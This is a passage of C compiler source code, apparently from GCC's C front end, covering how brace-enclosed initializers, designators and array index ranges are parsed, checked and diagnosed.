return build_vector_from_ctor (type,
CONSTRUCTOR_ELTS (inside_init));
}
}
if (warn_sequence_point)
verify_sequence_points (inside_init);
/* Any type can be initialized
from an expression of the same type, optionally with braces. */
if (inside_init && TREE_TYPE (inside_init) != NULL_TREE
&& (comptypes (TYPE_MAIN_VARIANT (TREE_TYPE (inside_init)),
TYPE_MAIN_VARIANT (type))
|| (code == ARRAY_TYPE
&& comptypes (TREE_TYPE (inside_init), type))
|| (gnu_vector_type_p (type)
&& comptypes (TREE_TYPE (inside_init), type))
|| (code == POINTER_TYPE
&& TREE_CODE (TREE_TYPE (inside_init)) == ARRAY_TYPE
&& comptypes (TREE_TYPE (TREE_TYPE (inside_init)),
TREE_TYPE (type)))))
{
if (code == POINTER_TYPE)
{
if (TREE_CODE (TREE_TYPE (inside_init)) == ARRAY_TYPE)
{
if (TREE_CODE (inside_init) == STRING_CST
|| TREE_CODE (inside_init) == COMPOUND_LITERAL_EXPR)
inside_init = array_to_pointer_conversion
(init_loc, inside_init);
else
{
error_init (init_loc, "invalid use of non-lvalue array");
return error_mark_node;
}
}
}
if (code == VECTOR_TYPE)
/* Although the types are compatible, we may require a
conversion. */
inside_init = convert (type, inside_init);
if (require_constant
&& TREE_CODE (inside_init) == COMPOUND_LITERAL_EXPR)
{
/* As an extension, allow initializing objects with static storage
duration with compound literals (which are then treated just as
the brace enclosed list they contain). Also allow this for
vectors, as we can only assign them with compound literals. */
if (flag_isoc99 && code != VECTOR_TYPE)
pedwarn_init (init_loc, OPT_Wpedantic, "initializer element "
"is not constant");
tree decl = COMPOUND_LITERAL_EXPR_DECL (inside_init);
inside_init = DECL_INITIAL (decl);
}
if (code == ARRAY_TYPE && TREE_CODE (inside_init) != STRING_CST
&& TREE_CODE (inside_init) != CONSTRUCTOR)
{
error_init (init_loc, "array initialized from non-constant array "
"expression");
return error_mark_node;
}
      /* Compound expressions can only occur here if -Wpedantic or
	 -pedantic-errors is specified.  In the latter case, we always want
	 an error.  In the former case, we simply want a warning.  */
if (require_constant && pedantic
&& TREE_CODE (inside_init) == COMPOUND_EXPR)
{
inside_init
= valid_compound_expr_initializer (inside_init,
TREE_TYPE (inside_init));
if (inside_init == error_mark_node)
error_init (init_loc, "initializer element is not constant");
else
pedwarn_init (init_loc, OPT_Wpedantic,
"initializer element is not constant");
if (flag_pedantic_errors)
inside_init = error_mark_node;
}
else if (require_constant
&& !initializer_constant_valid_p (inside_init,
TREE_TYPE (inside_init)))
{
error_init (init_loc, "initializer element is not constant");
inside_init = error_mark_node;
}
else if (require_constant && !maybe_const)
pedwarn_init (init_loc, OPT_Wpedantic,
"initializer element is not a constant expression");
/* Added to enable additional -Wsuggest-attribute=format warnings. */
if (TREE_CODE (TREE_TYPE (inside_init)) == POINTER_TYPE)
inside_init = convert_for_assignment (init_loc, UNKNOWN_LOCATION,
type, inside_init, origtype,
ic_init, null_pointer_constant,
NULL_TREE, NULL_TREE, 0);
return inside_init;
}
/* Handle scalar types, including conversions. */
if (code == INTEGER_TYPE || code == REAL_TYPE || code == FIXED_POINT_TYPE
|| code == POINTER_TYPE || code == ENUMERAL_TYPE || code == BOOLEAN_TYPE
|| code == COMPLEX_TYPE || code == VECTOR_TYPE)
{
if (TREE_CODE (TREE_TYPE (init)) == ARRAY_TYPE
&& (TREE_CODE (init) == STRING_CST
|| TREE_CODE (init) == COMPOUND_LITERAL_EXPR))
inside_init = init = array_to_pointer_conversion (init_loc, init);
if (semantic_type)
inside_init = build1 (EXCESS_PRECISION_EXPR, semantic_type,
inside_init);
inside_init
= convert_for_assignment (init_loc, UNKNOWN_LOCATION, type,
inside_init, origtype, ic_init,
null_pointer_constant, NULL_TREE, NULL_TREE,
0);
/* Check to see if we have already given an error message. */
if (inside_init == error_mark_node)
;
else if (require_constant && !TREE_CONSTANT (inside_init))
{
error_init (init_loc, "initializer element is not constant");
inside_init = error_mark_node;
}
else if (require_constant
&& !initializer_constant_valid_p (inside_init,
TREE_TYPE (inside_init)))
{
error_init (init_loc, "initializer element is not computable at "
"load time");
inside_init = error_mark_node;
}
else if (require_constant && !maybe_const)
pedwarn_init (init_loc, OPT_Wpedantic,
"initializer element is not a constant expression");
return inside_init;
}
/* Come here only for records and arrays. */
if (COMPLETE_TYPE_P (type) && TREE_CODE (TYPE_SIZE (type)) != INTEGER_CST)
{
error_init (init_loc, "variable-sized object may not be initialized");
return error_mark_node;
}
error_init (init_loc, "invalid initializer");
return error_mark_node;
}
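/* For example, digest_init rejects 'int n = 5; int a[n] = { 0 };' with
   "variable-sized object may not be initialized", and for
   'static int i = f ();' the scalar path above reports that the
   initializer element is not constant.  */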
/* Handle initializers that use braces. */
/* Type of object we are accumulating a constructor for.
This type is always a RECORD_TYPE, UNION_TYPE or ARRAY_TYPE. */
static tree constructor_type;
/* For a RECORD_TYPE or UNION_TYPE, this is the chain of fields
left to fill. */
static tree constructor_fields;
/* For an ARRAY_TYPE, this is the specified index
at which to store the next element we get. */
static tree constructor_index;
/* For an ARRAY_TYPE, this is the maximum index. */
static tree constructor_max_index;
/* For a RECORD_TYPE, this is the first field not yet written out. */
static tree constructor_unfilled_fields;
/* For an ARRAY_TYPE, this is the index of the first element
not yet written out. */
static tree constructor_unfilled_index;
/* In a RECORD_TYPE, the bit index of the next consecutive field.
   This is so we can generate gaps between fields, when appropriate.  */
static tree constructor_bit_index;
/* If we are saving up the elements rather than allocating them,
this is the list of elements so far (in reverse order,
most recent first). */
static vec<constructor_elt, va_gc> *constructor_elements;
/* 1 if constructor should be incrementally stored into a constructor chain,
   0 if all the elements should be kept in an AVL tree.  */
static int constructor_incremental;
/* 1 if so far this constructor's elements are all compile-time constants. */
static int constructor_constant;
/* 1 if so far this constructor's elements are all valid address constants. */
static int constructor_simple;
/* 1 if this constructor has an element that cannot be part of a
constant expression. */
static int constructor_nonconst;
/* 1 if this constructor is erroneous so far. */
static int constructor_erroneous;
/* 1 if this constructor is the universal zero initializer { 0 }. */
static int constructor_zeroinit;
/* Structure for managing pending initializer elements, organized as an
AVL tree. */
struct init_node
{
struct init_node *left, *right;
struct init_node *parent;
int balance;
tree purpose;
tree value;
tree origtype;
};
/* Tree of pending elements at this constructor level.
These are elements encountered out of order
which belong at places we haven't reached yet in actually
writing the output.
Will never hold tree nodes across GC runs. */
static struct init_node *constructor_pending_elts;
/* The SPELLING_DEPTH of this constructor. */
static int constructor_depth;
/* DECL node for which an initializer is being read.
0 means we are reading a constructor expression
such as (struct foo) {...}. */
static tree constructor_decl;
/* Nonzero if this is an initializer for a top-level decl. */
static int constructor_top_level;
/* Nonzero if there were any member designators in this initializer. */
static int constructor_designated;
/* Nesting depth of designator list. */
static int designator_depth;
/* Nonzero if there were diagnosed errors in this designator list. */
static int designator_erroneous;
/* This stack has a level for each implicit or explicit level of
structuring in the initializer, including the outermost one. It
saves the values of most of the variables above. */
struct constructor_range_stack;
struct constructor_stack
{
struct constructor_stack *next;
tree type;
tree fields;
tree index;
tree max_index;
tree unfilled_index;
tree unfilled_fields;
tree bit_index;
vec<constructor_elt, va_gc> *elements;
struct init_node *pending_elts;
int offset;
int depth;
/* If value nonzero, this value should replace the entire
constructor at this level. */
struct c_expr replacement_value;
struct constructor_range_stack *range_stack;
char constant;
char simple;
char nonconst;
char implicit;
char erroneous;
char outer;
char incremental;
char designated;
int designator_depth;
};
static struct constructor_stack *constructor_stack;
/* This stack represents designators from some range designator up to
the last designator in the list. */
struct constructor_range_stack
{
struct constructor_range_stack *next, *prev;
struct constructor_stack *stack;
tree range_start;
tree index;
tree range_end;
tree fields;
};
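/* For example, the GNU range designators in

     int a[10] = { [0 ... 4] = 1, [5 ... 9] = 2 };

   are driven by this stack: each designator list containing a range is
   replayed so that every index from range_start through range_end
   receives the corresponding value.  */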
static struct constructor_range_stack *constructor_range_stack;
/* This stack records separate initializers that are nested.
Nested initializers can't happen in ANSI C, but GNU C allows them
in cases like { ... (struct foo) { ... } ... }. */
struct initializer_stack
{
struct initializer_stack *next;
tree decl;
struct constructor_stack *constructor_stack;
struct constructor_range_stack *constructor_range_stack;
vec<constructor_elt, va_gc> *elements;
struct spelling *spelling;
struct spelling *spelling_base;
int spelling_size;
char top_level;
char require_constant_value;
char require_constant_elements;
rich_location *missing_brace_richloc;
};
static struct initializer_stack *initializer_stack;
/* Prepare to parse and output the initializer for variable DECL. */
void
start_init (tree decl, tree asmspec_tree ATTRIBUTE_UNUSED, int top_level,
rich_location *richloc)
{
const char *locus;
struct initializer_stack *p = XNEW (struct initializer_stack);
p->decl = constructor_decl;
p->require_constant_value = require_constant_value;
p->require_constant_elements = require_constant_elements;
p->constructor_stack = constructor_stack;
p->constructor_range_stack = constructor_range_stack;
p->elements = constructor_elements;
p->spelling = spelling;
p->spelling_base = spelling_base;
p->spelling_size = spelling_size;
p->top_level = constructor_top_level;
p->next = initializer_stack;
p->missing_brace_richloc = richloc;
initializer_stack = p;
constructor_decl = decl;
constructor_designated = 0;
constructor_top_level = top_level;
if (decl != NULL_TREE && decl != error_mark_node)
{
require_constant_value = TREE_STATIC (decl);
require_constant_elements
= ((TREE_STATIC (decl) || (pedantic && !flag_isoc99))
/* For a scalar, you can always use any value to initialize,
even within braces. */
&& AGGREGATE_TYPE_P (TREE_TYPE (decl)));
locus = identifier_to_locale (IDENTIFIER_POINTER (DECL_NAME (decl)));
}
else
{
require_constant_value = 0;
require_constant_elements = 0;
locus = _("(anonymous)");
}
constructor_stack = 0;
constructor_range_stack = 0;
found_missing_braces = 0;
spelling_base = 0;
spelling_size = 0;
RESTORE_SPELLING_DEPTH (0);
if (locus)
push_string (locus);
}
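/* For example, 'static int i = ...;' sets require_constant_value, and a
   static aggregate also sets require_constant_elements; with -pedantic
   in pre-C99 modes even an automatic aggregate requires constant
   elements, per the conditions above.  */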
void
finish_init (void)
{
struct initializer_stack *p = initializer_stack;
/* Free the whole constructor stack of this initializer. */
while (constructor_stack)
{
struct constructor_stack *q = constructor_stack;
constructor_stack = q->next;
free (q);
}
gcc_assert (!constructor_range_stack);
/* Pop back to the data of the outer initializer (if any). */
free (spelling_base);
constructor_decl = p->decl;
require_constant_value = p->require_constant_value;
require_constant_elements = p->require_constant_elements;
constructor_stack = p->constructor_stack;
constructor_range_stack = p->constructor_range_stack;
constructor_elements = p->elements;
spelling = p->spelling;
spelling_base = p->spelling_base;
spelling_size = p->spelling_size;
constructor_top_level = p->top_level;
initializer_stack = p->next;
free (p);
}
/* Call here when we see the initializer is surrounded by braces.
This is instead of a call to push_init_level;
it is matched by a call to pop_init_level.
TYPE is the type to initialize, for a constructor expression.
For an initializer for a decl, TYPE is zero. */
void
really_start_incremental_init (tree type)
{
struct constructor_stack *p = XNEW (struct constructor_stack);
if (type == NULL_TREE)
type = TREE_TYPE (constructor_decl);
if (VECTOR_TYPE_P (type)
&& TYPE_VECTOR_OPAQUE (type))
error ("opaque vector types cannot be initialized");
p->type = constructor_type;
p->fields = constructor_fields;
p->index = constructor_index;
p->max_index = constructor_max_index;
p->unfilled_index = constructor_unfilled_index;
p->unfilled_fields = constructor_unfilled_fields;
p->bit_index = constructor_bit_index;
p->elements = constructor_elements;
p->constant = constructor_constant;
p->simple = constructor_simple;
p->nonconst = constructor_nonconst;
p->erroneous = constructor_erroneous;
p->pending_elts = constructor_pending_elts;
p->depth = constructor_depth;
p->replacement_value.value = 0;
p->replacement_value.original_code = ERROR_MARK;
p->replacement_value.original_type = NULL;
p->implicit = 0;
p->range_stack = 0;
p->outer = 0;
p->incremental = constructor_incremental;
p->designated = constructor_designated;
p->designator_depth = designator_depth;
p->next = 0;
constructor_stack = p;
constructor_constant = 1;
constructor_simple = 1;
constructor_nonconst = 0;
constructor_depth = SPELLING_DEPTH ();
constructor_elements = NULL;
constructor_pending_elts = 0;
constructor_type = type;
constructor_incremental = 1;
constructor_designated = 0;
constructor_zeroinit = 1;
designator_depth = 0;
designator_erroneous = 0;
if (RECORD_OR_UNION_TYPE_P (constructor_type))
{
constructor_fields = TYPE_FIELDS (constructor_type);
/* Skip any nameless bit fields at the beginning. */
while (constructor_fields != NULL_TREE
&& DECL_UNNAMED_BIT_FIELD (constructor_fields))
constructor_fields = DECL_CHAIN (constructor_fields);
constructor_unfilled_fields = constructor_fields;
constructor_bit_index = bitsize_zero_node;
}
else if (TREE_CODE (constructor_type) == ARRAY_TYPE)
{
if (TYPE_DOMAIN (constructor_type))
{
constructor_max_index
= TYPE_MAX_VALUE (TYPE_DOMAIN (constructor_type));
/* Detect non-empty initializations of zero-length arrays. */
if (constructor_max_index == NULL_TREE
&& TYPE_SIZE (constructor_type))
constructor_max_index = integer_minus_one_node;
/* constructor_max_index needs to be an INTEGER_CST. Attempts
to initialize VLAs will cause a proper error; avoid tree
checking errors as well by setting a safe value. */
if (constructor_max_index
&& TREE_CODE (constructor_max_index) != INTEGER_CST)
constructor_max_index = integer_minus_one_node;
constructor_index
= convert (bitsizetype,
TYPE_MIN_VALUE (TYPE_DOMAIN (constructor_type)));
}
else
{
constructor_index = bitsize_zero_node;
constructor_max_index = NULL_TREE;
}
constructor_unfilled_index = constructor_index;
}
else if (gnu_vector_type_p (constructor_type))
{
/* Vectors are like simple fixed-size arrays. */
constructor_max_index =
bitsize_int (TYPE_VECTOR_SUBPARTS (constructor_type) - 1);
constructor_index = bitsize_zero_node;
constructor_unfilled_index = constructor_index;
}
else
{
/* Handle the case of int x = {5}; */
constructor_fields = constructor_type;
constructor_unfilled_fields = constructor_type;
}
}
extern location_t last_init_list_comma;
/* Called when we see an open brace for a nested initializer. Finish
off any pending levels with implicit braces. */
void
finish_implicit_inits (location_t loc, struct obstack *braced_init_obstack)
{
while (constructor_stack->implicit)
{
if (RECORD_OR_UNION_TYPE_P (constructor_type)
&& constructor_fields == NULL_TREE)
process_init_element (input_location,
pop_init_level (loc, 1, braced_init_obstack,
last_init_list_comma),
true, braced_init_obstack);
else if (TREE_CODE (constructor_type) == ARRAY_TYPE
&& constructor_max_index
&& tree_int_cst_lt (constructor_max_index,
constructor_index))
process_init_element (input_location,
pop_init_level (loc, 1, braced_init_obstack,
last_init_list_comma),
true, braced_init_obstack);
else
break;
}
}
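/* For example, in 'int m[2][2] = { 1, 2, { 3, 4 } };' the elements 1
   and 2 fill an implicit level for m[0]; when the open brace before 3
   is seen, that exhausted implicit level is popped here so that
   { 3, 4 } initializes m[1].  */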
/* Push down into a subobject, for initialization.
If this is for an explicit set of braces, IMPLICIT is 0.
If it is because the next element belongs at a lower level,
IMPLICIT is 1 (or 2 if the push is because of designator list). */
void
push_init_level (location_t loc, int implicit,
struct obstack *braced_init_obstack)
{
struct constructor_stack *p;
tree value = NULL_TREE;
/* Unless this is an explicit brace, we need to preserve previous
content if any. */
if (implicit)
{
if (RECORD_OR_UNION_TYPE_P (constructor_type) && constructor_fields)
value = find_init_member (constructor_fields, braced_init_obstack);
else if (TREE_CODE (constructor_type) == ARRAY_TYPE)
value = find_init_member (constructor_index, braced_init_obstack);
}
p = XNEW (struct constructor_stack);
p->type = constructor_type;
p->fields = constructor_fields;
p->index = constructor_index;
p->max_index = constructor_max_index;
p->unfilled_index = constructor_unfilled_index;
p->unfilled_fields = constructor_unfilled_fields;
p->bit_index = constructor_bit_index;
p->elements = constructor_elements;
p->constant = constructor_constant;
p->simple = constructor_simple;
p->nonconst = constructor_nonconst;
p->erroneous = constructor_erroneous;
p->pending_elts = constructor_pending_elts;
p->depth = constructor_depth;
p->replacement_value.value = NULL_TREE;
p->replacement_value.original_code = ERROR_MARK;
p->replacement_value.original_type = NULL;
p->implicit = implicit;
p->outer = 0;
p->incremental = constructor_incremental;
p->designated = constructor_designated;
p->designator_depth = designator_depth;
p->next = constructor_stack;
p->range_stack = 0;
constructor_stack = p;
constructor_constant = 1;
constructor_simple = 1;
constructor_nonconst = 0;
constructor_depth = SPELLING_DEPTH ();
constructor_elements = NULL;
constructor_incremental = 1;
constructor_designated = 0;
constructor_pending_elts = 0;
if (!implicit)
{
p->range_stack = constructor_range_stack;
constructor_range_stack = 0;
designator_depth = 0;
designator_erroneous = 0;
}
/* Don't die if an entire brace-pair level is superfluous
in the containing level. */
if (constructor_type == NULL_TREE)
;
else if (RECORD_OR_UNION_TYPE_P (constructor_type))
{
/* Don't die if there are extra init elts at the end. */
if (constructor_fields == NULL_TREE)
constructor_type = NULL_TREE;
else
{
constructor_type = TREE_TYPE (constructor_fields);
push_member_name (constructor_fields);
constructor_depth++;
}
/* If upper initializer is designated, then mark this as
designated too to prevent bogus warnings. */
constructor_designated = p->designated;
}
else if (TREE_CODE (constructor_type) == ARRAY_TYPE)
{
constructor_type = TREE_TYPE (constructor_type);
push_array_bounds (tree_to_uhwi (constructor_index));
constructor_depth++;
}
if (constructor_type == NULL_TREE)
{
error_init (loc, "extra brace group at end of initializer");
constructor_fields = NULL_TREE;
constructor_unfilled_fields = NULL_TREE;
return;
}
if (value && TREE_CODE (value) == CONSTRUCTOR)
{
constructor_constant = TREE_CONSTANT (value);
constructor_simple = TREE_STATIC (value);
constructor_nonconst = CONSTRUCTOR_NON_CONST (value);
constructor_elements = CONSTRUCTOR_ELTS (value);
if (!vec_safe_is_empty (constructor_elements)
&& (TREE_CODE (constructor_type) == RECORD_TYPE
|| TREE_CODE (constructor_type) == ARRAY_TYPE))
set_nonincremental_init (braced_init_obstack);
}
if (implicit == 1)
{
found_missing_braces = 1;
if (initializer_stack->missing_brace_richloc)
initializer_stack->missing_brace_richloc->add_fixit_insert_before
(loc, "{");
}
if (RECORD_OR_UNION_TYPE_P (constructor_type))
{
constructor_fields = TYPE_FIELDS (constructor_type);
/* Skip any nameless bit fields at the beginning. */
while (constructor_fields != NULL_TREE
&& DECL_UNNAMED_BIT_FIELD (constructor_fields))
constructor_fields = DECL_CHAIN (constructor_fields);
constructor_unfilled_fields = constructor_fields;
constructor_bit_index = bitsize_zero_node;
}
else if (gnu_vector_type_p (constructor_type))
{
/* Vectors are like simple fixed-size arrays. */
constructor_max_index =
bitsize_int (TYPE_VECTOR_SUBPARTS (constructor_type) - 1);
constructor_index = bitsize_int (0);
constructor_unfilled_index = constructor_index;
}
else if (TREE_CODE (constructor_type) == ARRAY_TYPE)
{
if (TYPE_DOMAIN (constructor_type))
{
constructor_max_index
= TYPE_MAX_VALUE (TYPE_DOMAIN (constructor_type));
/* Detect non-empty initializations of zero-length arrays. */
if (constructor_max_index == NULL_TREE
&& TYPE_SIZE (constructor_type))
constructor_max_index = integer_minus_one_node;
/* constructor_max_index needs to be an INTEGER_CST. Attempts
to initialize VLAs will cause a proper error; avoid tree
checking errors as well by setting a safe value. */
if (constructor_max_index
&& TREE_CODE (constructor_max_index) != INTEGER_CST)
constructor_max_index = integer_minus_one_node;
constructor_index
= convert (bitsizetype,
TYPE_MIN_VALUE (TYPE_DOMAIN (constructor_type)));
}
else
constructor_index = bitsize_zero_node;
constructor_unfilled_index = constructor_index;
if (value && TREE_CODE (value) == STRING_CST)
{
/* We need to split the char/wchar array into individual
characters, so that we don't have to special case it
everywhere. */
set_nonincremental_init_from_string (value, braced_init_obstack);
}
}
else
{
if (constructor_type != error_mark_node)
warning_init (input_location, 0, "braces around scalar initializer");
constructor_fields = constructor_type;
constructor_unfilled_fields = constructor_type;
}
}
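/* For example, given 'struct { struct { int x, y; } p; } v = { 1, 2 };'
   an implicit level (implicit == 1) is pushed for 'v.p', and the
   recorded fix-it hints let -Wmissing-braces suggest inserting the
   missing '{' and '}' around the inner elements.  */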
/* At the end of an implicit or explicit brace level,
finish up that level of constructor. If a single expression
with redundant braces initialized that level, return the
c_expr structure for that expression. Otherwise, the original_code
element is set to ERROR_MARK.
If we were outputting the elements as they are read, return 0 as the value
from inner levels (process_init_element ignores that),
but return error_mark_node as the value from the outermost level
(that's what we want to put in DECL_INITIAL).
Otherwise, return a CONSTRUCTOR expression as the value. */
struct c_expr
pop_init_level (location_t loc, int implicit,
struct obstack *braced_init_obstack,
location_t insert_before)
{
struct constructor_stack *p;
struct c_expr ret;
ret.value = NULL_TREE;
ret.original_code = ERROR_MARK;
ret.original_type = NULL;
if (implicit == 0)
{
/* When we come to an explicit close brace,
pop any inner levels that didn't have explicit braces. */
while (constructor_stack->implicit)
process_init_element (input_location,
pop_init_level (loc, 1, braced_init_obstack,
insert_before),
true, braced_init_obstack);
gcc_assert (!constructor_range_stack);
}
else
if (initializer_stack->missing_brace_richloc)
initializer_stack->missing_brace_richloc->add_fixit_insert_before
(insert_before, "}");
/* Now output all pending elements. */
constructor_incremental = 1;
output_pending_init_elements (1, braced_init_obstack);
p = constructor_stack;
/* Error for initializing a flexible array member, or a zero-length
array member in an inappropriate context. */
if (constructor_type && constructor_fields
&& TREE_CODE (constructor_type) == ARRAY_TYPE
&& TYPE_DOMAIN (constructor_type)
&& !TYPE_MAX_VALUE (TYPE_DOMAIN (constructor_type)))
{
/* Silently discard empty initializations. The parser will
already have pedwarned for empty brackets. */
if (integer_zerop (constructor_unfilled_index))
constructor_type = NULL_TREE;
else
{
gcc_assert (!TYPE_SIZE (constructor_type));
if (constructor_depth > 2)
error_init (loc, "initialization of flexible array member in a nested context");
else
pedwarn_init (loc, OPT_Wpedantic,
"initialization of a flexible array member");
/* We have already issued an error message for the existence
of a flexible array member not at the end of the structure.
Discard the initializer so that we do not die later. */
if (DECL_CHAIN (constructor_fields) != NULL_TREE)
constructor_type = NULL_TREE;
}
}
switch (vec_safe_length (constructor_elements))
{
case 0:
/* Initialization with { } counts as zeroinit. */
constructor_zeroinit = 1;
break;
case 1:
/* This might be zeroinit as well. */
if (integer_zerop ((*constructor_elements)[0].value))
constructor_zeroinit = 1;
break;
default:
/* If the constructor has more than one element, it can't be { 0 }. */
constructor_zeroinit = 0;
break;
}
/* Warn when some structs are initialized with direct aggregation. */
if (!implicit && found_missing_braces && warn_missing_braces
&& !constructor_zeroinit)
{
gcc_assert (initializer_stack->missing_brace_richloc);
warning_at (initializer_stack->missing_brace_richloc,
OPT_Wmissing_braces,
"missing braces around initializer");
}
/* Warn when some struct elements are implicitly initialized to zero. */
if (warn_missing_field_initializers
&& constructor_type
&& TREE_CODE (constructor_type) == RECORD_TYPE
&& constructor_unfilled_fields)
{
/* Do not warn for flexible array members or zero-length arrays. */
while (constructor_unfilled_fields
&& (!DECL_SIZE (constructor_unfilled_fields)
|| integer_zerop (DECL_SIZE (constructor_unfilled_fields))))
constructor_unfilled_fields = DECL_CHAIN (constructor_unfilled_fields);
if (constructor_unfilled_fields
/* Do not warn if this level of the initializer uses member
designators; it is likely to be deliberate. */
&& !constructor_designated
/* Do not warn about initializing with { 0 } or with { }. */
&& !constructor_zeroinit)
{
if (warning_at (input_location, OPT_Wmissing_field_initializers,
"missing initializer for field %qD of %qT",
constructor_unfilled_fields,
constructor_type))
inform (DECL_SOURCE_LOCATION (constructor_unfilled_fields),
"%qD declared here", constructor_unfilled_fields);
}
}
/* Pad out the end of the structure. */
if (p->replacement_value.value)
/* If this closes a superfluous brace pair,
just pass out the element between them. */
ret = p->replacement_value;
else if (constructor_type == NULL_TREE)
;
else if (!RECORD_OR_UNION_TYPE_P (constructor_type)
&& TREE_CODE (constructor_type) != ARRAY_TYPE
&& !gnu_vector_type_p (constructor_type))
{
/* A nonincremental scalar initializer--just return
the element, after verifying there is just one. */
if (vec_safe_is_empty (constructor_elements))
{
if (!constructor_erroneous && constructor_type != error_mark_node)
error_init (loc, "empty scalar initializer");
ret.value = error_mark_node;
}
else if (vec_safe_length (constructor_elements) != 1)
{
error_init (loc, "extra elements in scalar initializer");
ret.value = (*constructor_elements)[0].value;
}
else
ret.value = (*constructor_elements)[0].value;
}
else
{
if (constructor_erroneous)
ret.value = error_mark_node;
else
{
ret.value = build_constructor (constructor_type,
constructor_elements);
if (constructor_constant)
TREE_CONSTANT (ret.value) = 1;
if (constructor_constant && constructor_simple)
TREE_STATIC (ret.value) = 1;
if (constructor_nonconst)
CONSTRUCTOR_NON_CONST (ret.value) = 1;
}
}
if (ret.value && TREE_CODE (ret.value) != CONSTRUCTOR)
{
if (constructor_nonconst)
ret.original_code = C_MAYBE_CONST_EXPR;
else if (ret.original_code == C_MAYBE_CONST_EXPR)
ret.original_code = ERROR_MARK;
}
constructor_type = p->type;
constructor_fields = p->fields;
constructor_index = p->index;
constructor_max_index = p->max_index;
constructor_unfilled_index = p->unfilled_index;
constructor_unfilled_fields = p->unfilled_fields;
constructor_bit_index = p->bit_index;
constructor_elements = p->elements;
constructor_constant = p->constant;
constructor_simple = p->simple;
constructor_nonconst = p->nonconst;
constructor_erroneous = p->erroneous;
constructor_incremental = p->incremental;
constructor_designated = p->designated;
designator_depth = p->designator_depth;
constructor_pending_elts = p->pending_elts;
constructor_depth = p->depth;
if (!p->implicit)
constructor_range_stack = p->range_stack;
RESTORE_SPELLING_DEPTH (constructor_depth);
constructor_stack = p->next;
free (p);
if (ret.value == NULL_TREE && constructor_stack == 0)
ret.value = error_mark_node;
return ret;
}
/* Common handling for both array range and field name designators.
ARRAY argument is nonzero for array ranges. Returns false for success. */
static bool
set_designator (location_t loc, bool array,
struct obstack *braced_init_obstack)
{
tree subtype;
enum tree_code subcode;
/* Don't die if an entire brace-pair level is superfluous
in the containing level, or for an erroneous type. */
if (constructor_type == NULL_TREE || constructor_type == error_mark_node)
return true;
/* If there were errors in this designator list already, bail out
silently. */
if (designator_erroneous)
return true;
/* Likewise for an initializer for a variable-size type. Those are
diagnosed in digest_init. */
if (COMPLETE_TYPE_P (constructor_type)
&& TREE_CODE (TYPE_SIZE (constructor_type)) != INTEGER_CST)
return true;
if (!designator_depth)
{
gcc_assert (!constructor_range_stack);
/* Designator list starts at the level of closest explicit
braces. */
while (constructor_stack->implicit)
process_init_element (input_location,
pop_init_level (loc, 1, braced_init_obstack,
last_init_list_comma),
true, braced_init_obstack);
constructor_designated = 1;
return false;
}
switch (TREE_CODE (constructor_type))
{
case RECORD_TYPE:
case UNION_TYPE:
subtype = TREE_TYPE (constructor_fields);
if (subtype != error_mark_node)
subtype = TYPE_MAIN_VARIANT (subtype);
break;
case ARRAY_TYPE:
subtype = TYPE_MAIN_VARIANT (TREE_TYPE (constructor_type));
break;
default:
gcc_unreachable ();
}
subcode = TREE_CODE (subtype);
if (array && subcode != ARRAY_TYPE)
{
error_init (loc, "array index in non-array initializer");
return true;
}
else if (!array && subcode != RECORD_TYPE && subcode != UNION_TYPE)
{
error_init (loc, "field name not in record or union initializer");
return true;
}
constructor_designated = 1;
finish_implicit_inits (loc, braced_init_obstack);
push_init_level (loc, 2, braced_init_obstack);
return false;
}
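/* For example, for 'struct { int a; struct { int b, c; } s; } v =
   { .s.c = 1 };' the second component of the designator '.s.c' arrives
   with designator_depth == 1, so a level (implicit == 2) is pushed for
   'v.s' before 'c' is looked up by set_init_label.  */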
/* If there are range designators in the designator list, push a new
   designator to constructor_range_stack.  RANGE_END is the end of the
   range, or NULL_TREE if there is no range designator at this level.  */
static void
push_range_stack (tree range_end, struct obstack * braced_init_obstack)
{
struct constructor_range_stack *p;
p = (struct constructor_range_stack *)
obstack_alloc (braced_init_obstack,
sizeof (struct constructor_range_stack));
p->prev = constructor_range_stack;
p->next = 0;
p->fields = constructor_fields;
p->range_start = constructor_index;
p->index = constructor_index;
p->stack = constructor_stack;
p->range_end = range_end;
if (constructor_range_stack)
constructor_range_stack->next = p;
constructor_range_stack = p;
}
/* Within an array initializer, specify the next index to be initialized.
FIRST is that index. If LAST is nonzero, then initialize a range
of indices, running from FIRST through LAST. */
void
set_init_index (location_t loc, tree first, tree last,
struct obstack *braced_init_obstack)
{
if (set_designator (loc, true, braced_init_obstack))
return;
designator_erroneous = 1;
if (!INTEGRAL_TYPE_P (TREE_TYPE (first))
|| (last && !INTEGRAL_TYPE_P (TREE_TYPE (last))))
{
error_init (loc, "array index in initializer not of integer type");
return;
}
if (TREE_CODE (first) != INTEGER_CST)
{
first = c_fully_fold (first, false, NULL);
if (TREE_CODE (first) == INTEGER_CST)
pedwarn_init (loc, OPT_Wpedantic,
"array index in initializer is not "
"an integer constant expression");
}
if (last && TREE_CODE (last) != INTEGER_CST)
{
last = c_fully_fold (last, false, NULL);
if (TREE_CODE (last) == INTEGER_CST)
pedwarn_init (loc, OPT_Wpedantic,
"array index in initializer is not "
"an integer constant expression");
}
if (TREE_CODE (first) != INTEGER_CST)
error_init (loc, "nonconstant array index in initializer");
else if (last != NULL_TREE && TREE_CODE (last) != INTEGER_CST)
error_init (loc, "nonconstant array index in initializer");
else if (TREE_CODE (constructor_type) != ARRAY_TYPE)
error_init (loc, "array index in non-array initializer");
else if (tree_int_cst_sgn (first) == -1)
error_init (loc, "array index in initializer exceeds array bounds");
else if (constructor_max_index
&& tree_int_cst_lt (constructor_max_index, first))
error_init (loc, "array index in initializer exceeds array bounds");
else
{
constant_expression_warning (first);
if (last)
constant_expression_warning (last);
constructor_index = convert (bitsizetype, first);
if (tree_int_cst_lt (constructor_index, first))
{
constructor_index = copy_node (constructor_index);
TREE_OVERFLOW (constructor_index) = 1;
}
if (last)
{
if (tree_int_cst_equal (first, last))
last = NULL_TREE;
else if (tree_int_cst_lt (last, first))
{
error_init (loc, "empty index range in initializer");
last = NULL_TREE;
}
else
{
last = convert (bitsizetype, last);
if (constructor_max_index != NULL_TREE
&& tree_int_cst_lt (constructor_max_index, last))
{
error_init (loc, "array index range in initializer exceeds "
"array bounds");
last = NULL_TREE;
}
}
}
designator_depth++;
designator_erroneous = 0;
if (constructor_range_stack || last)
push_range_stack (last, braced_init_obstack);
}
}
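/* For example, 'int a[3] = { [5] = 1 };' and 'int a[3] = { [-1] = 1 };'
   both report "array index in initializer exceeds array bounds", while
   in 'int a[] = { [5] = 1 };' there is no constructor_max_index and the
   array length is deduced from the designators later.  */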
/* Within a struct initializer, specify the next field to be initialized. */
void
